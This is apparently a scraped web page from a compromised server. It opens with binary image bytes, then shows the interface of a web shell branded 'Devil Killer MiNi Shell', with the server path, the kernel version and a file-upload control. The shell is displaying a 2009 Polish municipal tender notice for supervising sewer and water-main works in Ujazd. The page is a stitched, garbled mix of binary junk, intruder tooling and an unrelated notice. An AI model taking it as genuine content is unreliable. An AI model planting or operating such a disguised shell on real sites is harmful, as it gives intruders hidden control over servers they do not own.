JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090415/105288-N-2009.html

<p class="kh_header"><b>Ujazd: Pełnienie obowiązków  nadzoru inwestorskiego nad robotami budowlanymi dla projektu pn:
Budowa kanalizacji sanitarnej i wymiany sieci wodociągowej dla wsi Klucz, Olszowa wraz z osiedlem mieszkaniowym Księży Las i SAG Olszowa.</b><br>
<b>Numer ogłoszenia: 105288 - 2009; data zamieszczenia: 15.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ujazd , ul. Sławięcicka 19, 47-143 Ujazd, woj. opolskie, tel. 0-77 4048750,4048757,4048757, faks 0-77 4637081.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ujazd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków  nadzoru inwestorskiego nad robotami budowlanymi dla projektu pn:
Budowa kanalizacji sanitarnej i wymiany sieci wodociągowej dla wsi Klucz, Olszowa wraz z osiedlem mieszkaniowym Księży Las i SAG Olszowa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie  obejmuje  kompleksowy nadzór i kontrolowanie rozliczenia robót w branżach:
instalacyjno - sanitarnych ,
instalacji elektroenergetycznych,
drogowej.
3. Zakres rzeczowy nadzorowanego zadania inwestycyjnego: 
 Zadanie 1. Budowa kanalizacji sanitarnej i wymiana sieci wodociągowej dla wsi Klucz i Olszowa
      I.   Kanalizacja sanitarna w miejscowości Klucz :
1.	Kanalizacja sanitarna grawitacyjna w m. Klucz z rur PCV O 160 - 200 - 1 550,00 mb,
2.	Przykanaliki kanalizacji sanitarnej z rur PCV O 160 - 702 mb/44 szt.
3.	Przyłącza  kanalizacji sanitarnej z rur PCV O 160- 309 mb/44 szt.
4.	Przepompownia ścieków PK-1  z uzbrojeniem towarzyszącym i zasilaniem energetycznym - 1 szt.
II.  Kanalizacja sanitarna w miejscowości Klucz Wapiennik
1.	Przykanaliki kanalizacji sanitarnej z rur PCV O 160- 7m/3 szt,
2.	Przepompownie przydomowe - 3 szt,
3.	Przyłącza  kanalizacji sanitarnej z rur PCV O 160 - 13 m/ 3 szt,
III.  Kanalizacja sanitarna w miejscowości Olszowa : 
1.	Kanalizacja sanitarna grawitacyjna w m. Olszowa  z rur PCV O 160 - 200 - 1 864,00 mb,
2.	Przykanaliki kanalizacji sanitarnej z rur PCV O 160 - 1410 mb/72 szt.
3.	Przyłącza  kanalizacji sanitarnej z rur PCV O 160- 455 mb/72 szt.
4.	Przepompownia ścieków PO-1  z uzbrojeniem towarzyszącym i zasilaniem energetycznym - 1 szt.
IV.  Sieć wodociągowa dla wsi Klucz i Olszowa
1.	Sieć wodociągowa tranzytowa Zimna Wódka - Klucz - Olszowa  z rur PE 160 - 1862 mb,
2.	Sieć wodociągowa rozdzielcza w m. Klucz z rur PE 160-63 mm - 1378 mb,
3.	Przyłącza wodociągowe w m. Klucz i  Klucz Wapiennik z rur PE 32-40 - 1 046 mb/47 szt,
4.	Sieć wodociągowa rozdzielcza w m. Olszowa  z rur PE 160-90 mm - 1729,00 mb,
5.	Przyłącza wodociągowe we wsi Olszowa z rur PE 32-63mm - 1474/70 szt
6.	Odtworzenie dróg po robotach kanalizacyjnych i wodociągowych w  Klucz i Olszowa 
Zadanie 2 -  Budowa kanalizacji sanitarnej i wymiana sieci wodociągowej dla osiedla mieszkaniowego Księży Las
1.	Przyłącza kanalizacji sanitarnej grawitacyjnej z rur PCV O 160 mm - 178 mb,
2.	Przyłącza wodociągowe  z rur PE 63 - 32  mm - 61,35 mb ,
3.	Kanalizacja sanitarna grawitacyjna z rur PCV O 160-200 mm - 600,70 mb, 
4.	Sieć wodociągowa rozdzielcza z rur PE 110 - 430,65 mb.
5.	Stanowisko czerpania wody do celów p.poż,
6.	Montaż przepompowni przydomowej - 1 kmp,
7.	 Przepompownia ścieków PKl  z uzbrojeniem towarzyszącym i zasilaniem energetycznym - 1 szt.
8.	Odtworzenie dróg po robotach kanalizacyjnych i wodociągowych.
Zadanie 3 -  Rurociąg tłoczny z przepompowni PS-2 w SAG Olszowa do sieci w Olszowej 
1.	Rurociąg tłoczny z rur PEHD  O 110  - o dł. 1469,00 mb,
2.	Rurociąg grawitacyjny z rur PCV O 200 - o dł.138,00 mb 
Wykonawca zobowiązuje się ponadto do wykonania następujących czynności:
 1/ udział w przekazaniu placu budowy,
 2/ sprawdzenie postępu robót, dokonywanie odbiorów częściowych,
 3/ sporządzania meldunków z zaawansowania rzeczowo-finansowego robót, 
 4/ uzgodnienie z Inwestorem, Wykonawcą i autorem projektów ewentualnych robót dodatkowych lub zamiennych, 
5/ udział w pracach komisji i naradach koordynacyjnych, 
6/ sprawdzania i odbioru robót zanikających (ulegających zakryciu), 
7/ udział w komisjach rozruchowych instalacji i obiektów technologicznych,
 8/ sprawdzania i zatwierdzenia do zapłaty rachunków i faktur za wykonane roboty, 
9/ sprawdzenie kompletności operatu powykonawczego, 
10/ prowadzenie ewidencji kosztów nadzorowanych robót w układzie umożliwiającym udokumentowanie wartości nadzoru inwestorskiego, 
11/zapewnienie przestrzegania i stosowania polskiego prawa budowlanego przez Wykonawcę robót, 
12/ prowadzenie z Wykonawcą robót odbiorów częściowych i końcowych
13/ rozliczanie rzeczowe i finansowe zamówienia na roboty budowlane, 
14/ stałe konsultacje i fachowe doradztwo dla Zamawiającego 
15/ potwierdzanie faktycznie wykonanych robót, oraz usunięcia wad...</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.23.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy , którzy
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Opis sposobu dokonywania oceny spełniania warunku: 
Wykonawca spełnia warunek, jeżeli posiada uprawnienia do wykonywania określonej działalności lub czynności (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie każdego wykonawcy odrębnie). - Wykonawca spełnia warunek, jeżeli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu oraz dokumenty potwierdzające spełnianie tych warunków, z zastrzeżeniem art. 26 ust. 3 Ustawy Pzp. 
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia; 
 Opis sposobu dokonywania oceny spełniania warunku: 
a)	Wykonawca spełnia warunek, jeżeli w okresie ostatnich trzech  lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie  udokumentuje pozytywne doświadczenie w zakresie pełnienia nadzorów inwestorskich nad  robotami o charakterze i złożoności zakresu podobnym do zamówienia przetargowego ( Wykonawca  przedstawi co najmniej 1 referencję na  usługi w nadzorowaniu kanalizacji sanitarnej i sieci wodociągowej z PE  o długości tych sieci co najmniej 1,5 km oraz 2 usług nad budową kanalizacji sanitarnej o wartości netto  zadania co najmniej  3 000 000 zł. Co najmniej jedno zadanie powinno w swoim zakresie zawierać wykonanie kanalizacji sanitarnej grawitacyjnej, przykanaliki, rurociąg tłoczny, przepompownie ścieków z zasilaniem elektrycznym, odtworzenie dróg po robotach z asfaltu.   
 (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).  
b)Wykonawca spełnia warunek jeżeli dysponuje osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia takich osób, spełniających co najmniej następujące wymagania: 
      Inspektor nadzoru w branży instalacyjnej - specjalista posiadający  minimum 5 letnie doświadczenie zawodowe jako Inspektor Nadzoru ,  uprawnienia budowlane do   nadzorowania  robót   w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń (zgodne z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie [Dz. U. z dnia 16 maja 2006 r. Nr 83poz. 578]) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa w zakresie pełnionej funkcji, aktualny wpis do właściwej Izby Samorządu Zawodowego;  (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).
      Inspektor nadzoru w branży drogowej -  specjalista posiadający minimum 5 letnie doświadczenie zawodowe  jako Inspektor Nadzoru -  posiadający:  uprawnienia budowlane do nadzorowania  robót w zakresie budowy dróg bez ograniczeń lub w ograniczonym zakresie  (zgodne z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie [Dz. U. z dnia 16 maja 2006 r. Nr 83 poz. 578]) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa w zakresie pełnionej funkcji, oraz aktualny wpis do właściwej Izby Samorządu Zawodowego. (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).
      Inspektora Nadzoru w branży elektrycznej   -  specjalista posiadający minimum 5 letnie doświadczenie zawodowe  jako Inspektor Nadzoru    posiadający uprawnienia budowlane do nadzorowania   robót w zakresie sieci , instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub w ograniczonym zakresie (zgodne z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie [Dz. U. z dnia 16 maja 2006 r. Nr 83 poz. 578]) lub odpowiadające im ważne uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów, oraz aktualny wpis do właściwej Izby Samorządu Zawodowego; (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie),
3)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 

Opis sposobu dokonywania oceny spełniania warunku: 
Wykonawca zobowiązany jest złożyć oświadczenie pod rygorem odpowiedzialności    karnej.

4)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2007 r. Nr 223, poz. 1655, ze zm.);

Opis sposobu dokonywania oceny spełniania warunku: 
Wykonawca zobowiązany jest złożyć oświadczenie pod rygorem odpowiedzialności    karnej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy zobowiązani są dostarczyć następujące oświadczenia lub dokumenty dla potwierdzenia spełnienia warunków udziału w postępowaniu:
1)	Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1 pkt 1-3 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych; 
2)	Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych; 
3)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
4)	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio , że Wykonawca nie zalega z opłacaniem podatków , opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty  zaległych płatności  lub wstrzymane w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.; 
5)	Wykaz wykonanych robót budowlanych w okresie ostatnich trzech  lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie;
a.	UWAGA : w wykazie robót należy ująć zadania  dotyczące budowy kanalizacji sanitarnej grawitacyjnej  i sieci wodociągowej z PE  o długości tych sieci co najmniej 1,5 km  każda oraz 2 usług nad budową kanalizacji sanitarnej o wartości netto  zadania co najmniej  3 000 000 zł. Co najmniej jedno zadanie powinno w swoim zakresie zawierać wykonanie kanalizacji sanitarnej grawitacyjnej, przykanaliki, rurociąg tłoczny, przepompownie ścieków z zasilaniem elektrycznym, odtworzenie dróg po robotach z asfaltu.   
6)	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w  wykonywaniu zamówienia, wraz z  informacjami na temat  ich kwalifikacji zawodowych doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności ;   
7)	Pisemnego zobowiązania innych podmiotów do udostęonienia osób zdolnych do wykonania zamówienia ,jeżeli w wykazie , o którym mowa w pkt.VI.6. wykonawca wskazał osoby , którymi będzie dysponował ;
8)	Dokumenty stwierdzające, że w/w osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia tj. oryginały lub kopie stosownych uprawnień budowlanych i zaświadczeń o przynależności do właściwej izby samorządu zawodowego;
9)	W przypadku składania wniosku przez Konsorcjum bezwzględnie jest wymagane wskazanie składu grupy wykonawców oraz podmiotu wiodącego -  pełnomocnika wraz z określeniem jego roli do występowania w imieniu grupy wykonawców, stosownie do  zapisu art. 23 ust. 2 ustawy Prawo zamówień publicznych.
10)	W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców wraz z ofertą  muszą być złożone dokumenty wymienione w pkt.1,  2 ,3 i 4  przez każdego w nich) .
11)	W przypadku złożenia wniosku przez Wykonawców wspólnie ubiegających się 
o zamówienie (zgodnie z treścią art. 23 ustawy Prawo zamówień publicznych) kwalifikacja podmiotowa rozpatrywana będzie jako łączne (sumaryczne) kryterium spełnienia warunków.
12)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej musi przedłożyć dokumenty, zgodnie z zapisami § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzaju dokumentów , jakich może żądać  zamawiający od Wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz.U. Nr 87 poz.605 z póź.zm.)

a) w zamian za dokumenty o których mowa w pkt VIII 3 i 4 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
-	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu,
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;

Dokumenty, o których mowa w lit a tiret 1 i 3 , powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia. Dokument, o którym mowa lit a tiret 2, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia .
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w lit a), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
 
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ujazd.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ujeździe, ul. Sławięcicka 19, 47-143 Ujazd, pokj nr 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2009 godzina 09:00, miejsce: Urząd Miesjki w Ujeździe, ul. Sławięcicka 19, 47-143 Ujazd, pokój nr 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com